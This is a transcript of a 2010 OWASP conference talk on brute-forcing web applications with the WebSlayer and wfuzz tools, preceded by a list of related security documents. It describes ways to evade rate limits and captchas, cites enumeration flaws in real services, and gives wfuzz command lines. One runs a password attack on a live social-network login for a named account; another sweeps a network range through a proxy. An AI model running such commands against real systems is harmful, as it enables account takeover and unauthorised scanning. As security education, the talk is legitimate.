2010: and still bruteforcing

Similar documents
Application Security Testing. Generic Test Strategy

Check list for web developers

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

Recon and Mapping Tools and Exploitation Tools in SamuraiWTF Report section Nick Robbins

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

BASELINE SECURITY TEST PLAN FOR EDUCATIONAL WEB AND MOBILE APPLICATIONS

Security vulnerabilities in new web applications. Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant

A fresh new look into Information Gathering. Christian Martorella IV OWASP MEETING SPAIN

Penetration Testing with Selenium. OWASP 14 January The OWASP Foundation

FINAL DoIT v.8 APPLICATION SECURITY PROCEDURE

Cross-Site Scripting

STABLE & SECURE BANK lab writeup. Page 1 of 21

What is Web Security? Motivation

Web Application Attacks and Countermeasures: Case Studies from Financial Systems

(WAPT) Web Application Penetration Testing

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

Web Application Vulnerability Testing with Nessus

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management

Acunetix Web Vulnerability Scanner. Getting Started. By Acunetix Ltd.

Lecture 11 Web Application Security (part 1)

Client logo placeholder XXX REPORT. Page 1 of 37

Sitefinity Security and Best Practices

HP WebInspect Tutorial

Pentesting With Burp Suite Taking the web back from automated scanners

FINAL DoIT v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES

Web Application Security Guidelines for Hosting Dynamic Websites on NIC Servers

Criteria for web application security check. Version

WebCruiser User Guide

Essential IT Security Testing

EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke

Using Foundstone CookieDigger to Analyze Web Session Management

DISCOVERY OF WEB-APPLICATION VULNERABILITIES USING FUZZING TECHNIQUES

The Top Web Application Attacks: Are you vulnerable?

Web Application Penetration Testing

CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities

Web Application Security

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

CS 558 Internet Systems and Technologies

Last update: February 23, 2004

Penetration: from Application down to OS

Web Application Report

Common Security Vulnerabilities in Online Payment Systems

Web Application Security

Top 10 Web Application Security Vulnerabilities - with focus on PHP

ASL IT Security Advanced Web Exploitation Kung Fu V2.0

Penetration Testing with Kali Linux

MatriXay WEB Application Vulnerability Scanner V Overview. (DAS- WEBScan ) The best WEB application assessment tool

WEB ATTACKS AND COUNTERMEASURES

Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008

Application Security Testing

Application Layer Encryption: Protecting against Application Logic and Session Theft Attacks. Whitepaper

External Network & Web Application Assessment. For The XXX Group LLC October 2012

Secure Web Application Coding Team Introductory Meeting December 1, :00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda

Acunetix Web Vulnerability Scanner. Manual V6.5. By Acunetix Ltd.

WEB APPLICATION HACKING. Part 2: Tools of the Trade (and how to use them)

MANAGED SECURITY TESTING

Kentico CMS security facts

Web Security Threat Report: January April Ryan C. Barnett WASC Member Project Lead: Distributed Open Proxy Honeypots

Ruby on Rails Secure Coding Recommendations

QualysGuard WAS. Getting Started Guide Version 3.3. March 21, 2014

Network Security Exercise #8

Chapter 1 Web Application (In)security 1

Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

Introduction to Computer Security

MITB Grabbing Login Credentials

WEB APPLICATION SECURITY

ArcGIS Server Security Threats & Best Practices David Cordes Michael Young

Web Application Security Considerations

Common Criteria Web Application Security Scoring CCWAPSS

Application Security Testing. Erez Metula (CISSP), Founder Application Security Expert

Application Security Best Practices. Wally LEE Principal Consultant

Still Aren't Doing. Frank Kim

Newsletter - September T o o l s W a t c h T e a m NJ OUCHN & MJ SOLER

WebCruiser Web Vulnerability Scanner User Guide

Cross Site Scripting in Joomla Acajoom Component

Web Application Report

Vulnerability Assessment and Penetration Testing

Adobe Systems Incorporated

Implementation of Web Application Firewall

Conducting Web Application Pentests. From Scoping to Report For Education Purposes Only

Top Ten Web Application Vulnerabilities in J2EE. Vincent Partington and Eelco Klaver Xebia

Web Security Testing Cookbook*

OWASP TOP 10 ILIA

A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith

Overview of the Penetration Test Implementation and Service. Peter Kanters

Secure Web Development Teaching Modules 1. Security Testing. 1.1 Security Practices for Software Verification

Secure Web Development Teaching Modules 1. Threat Assessment

OWASP Web Application Penetration Checklist. Version 1.1

Where every interaction matters.

RemotelyAnywhere. Security Considerations

Web Application Guidelines

Semantic based Web Application Firewall (SWAF V 1.6) Operations and User Manual. Document Version 1.0

Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure

Web Vulnerability Scanner v9 User Manual

Software Assurance Tools: Web Application Security Scanner Functional Specification Version 1.0

Transcription:

2010: and still bruteforcing OWASP Webslayer Christian Martorella July 18th 2010 Barcelona

Who am I Manager Auditoria CISSP, CISA, CISM, OPST, OPSA,CEH OWASP WebSlayer Project Leader FIST Conference, Presidente Edge-Security.com

Brute force attack Is a method to determine an unknown value by using an automated process to try a large number of possible values.

What can be bruteforced? Credentials (HTML Forms and HTTP) Session identifiers (session id s) Predictable resource location (directories and files) Variable values Cookies WebServices methods (rest)

Where? Headers Forms (POST) URL (GET) Authentication (Basic, NTML)

How? Dictionary attack Search attack (all possible combinations of a character set and a given length) Rule based search attack (use rules to generate candidates)

Why 2010 and still bruteforcing? In 2007 Gunter Ollmann proposed a series of countermeasures to stop automated attack tools.

Countermeasures Block HEAD requests Timeouts and thresholds Referer checks Tokens

Countermeasures Turing tests (captchas) Honeypot links One time links Custom messages Token resource metering (Hashcash)

Countermeasures

Workarounds

Workarounds Captcha breakers

Workarounds Distributing scanning source traffic Proxy HTTP 1 Attacker Proxy HTTP... Proxy HTTP N Target

Workarounds Distributing scanning on different targets Target-server-1 Attacker Target-server-2 Target-server-3

Workarounds Diagonal scanning (different username/password each round) Horizontal scanning (different usernames for common passwords) Three dimension ( Horizontal,Vertical or Diagonal + Distributing source IP) Four dimensions ( Horizontal, Vertical or Diagonal + time delay)

2010... 114.000 emails https://dcp2.att.com/oepclient/openpage?iccid=number&imei=0

2010... Access Any Users Photo Albums http://www.facebook.com/album.php?aid=-3&id=1508034566&l=aad9c aid=-3 (-3 for every public profile album) id=0123456789 l=? (all we know is its 5 characters from the 0123456789abcdef range)

2010... The 500 worst passwords list Alyssa banned passwords list Cain s list of passwords Conficker s list The English dictionary Faithwriters banned passwords list Hak5 s list Hotmail s banned passwords list Myspace s banned passwords list PHPbb s compromised list RockYou s compromised list Twitter s banned passwords list

2010...

2010... Webservices OK:0:username http://l33.login.scd.yahoo.com/ config/isp_verify_user? l=username&p=password ERROR:101:Invalid Password ERROR:102:Invalid Login

2010... Password bruteforce 946 tries python wfuzz.py -c -z file -f wordlists/common.txt --hc 200 - d"email=securik@gmail.com&input_password=fuzz&timezone=1" "https://www.tuenti.com/? m=login&func=do_login"

Tools Automated scanning tools are designed to take full advantage of the state-less nature of the HTTP protocol and insecure development techniques.

Tools Evolution of WFUZZ

Webslayer The main objective is to provide to the security tester a tool to perform highly customized brute force attacks on web applications, and a useful results analysis interface. It was designed thinking in the professional tester.

Webslayer

Webslayer Predictable credentials (HTML Forms and HTTP) Predictable sessions identifier (cookies,hidden fields, url) Predictable resource location (directories and files) Variables values and ranges Cookies WebServices methods Traversals, Injections, Overflows, etc

Webslayer Encodings: 15 encodings supported Authentication: supports Ntml and Basic (known or guess) Multiple payloads: you can use 2 payloads in different parts Proxy support (authentication supported) Multithreads Multiple filters for improving the performance and for producing cleaner results

Webslayer Predictable resource location: Recursion, common extensions, non standard code detection, (Huge collection of dictionaries) Advanced payload generation Live filters Session saving/restoring Integrated browser (webkit) Full page screenshot

Resource location prediction Based on the idea of Dirb (Darkraver) Custom dictionaries of know resources or common passwords Servers: Tomcat,Websphere,Weblogic,Vignette,etc Common words: common (950), big (3500), spanish CGIs (vulnerabilities) Webservices Injections (SQL, XSS, XML,Traversals)

Payload Generation Payload generator: Usernames Credit Card numbers Permutations Character blocks Ranges Files Pattern creator and regular expression (encoders)

Demo

Advanced uses Sweep an entire range with a common dictionary HTTP://192.168.1.FUZZ/FUZ2Z FUZZ: RANGE [1-254] FUZ2Z: common.txt

Advanced uses Scanning through proxies me ----> Server w/proxy ---->LAN wfuzz -x serverip:53 -c -z range -r 1-254 --hc XXX -t 5 http://10.10.1.fuzz -x set proxy --hc is used to hide the XXX error code from the results, as machines w/o webserver will fail the request.

Future features Time delay between request Multiple proxies (distribute attack) Diagonal scanning (mix dictionaries)

?

Contact cmartorella _at_s21sec.com cmartorella_at_edge-security.com http://twitter.com/laramies http://laramies.blogspot.com http://www.edge-security.com

References http://www.owasp.org/index.php/testing_for_brute_force_(owasp-at-004) http://projects.webappsec.org/predictable-resource-location http://projects.webappsec.org/credential-and-session-prediction http://projects.webappsec.org/brute-force http://www.technicalinfo.net/papers/stoppingautomatedattacktools.html http://gawker.com/5559346/ http://tacticalwebappsec.blogspot.com/2009/09/distributed-brute-force-attacks-against.html http://praetorianprefect.com/archives/2010/06/114000-ipad-owners-the-script-that-harvested-theire-mail-addresses/ http://www.securitybydefault.com/2009/07/no-no-uses-captchas-ni-ningun-otro.html http://nukeit.org/facebook-hack-access-any-users-photo-albums/

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information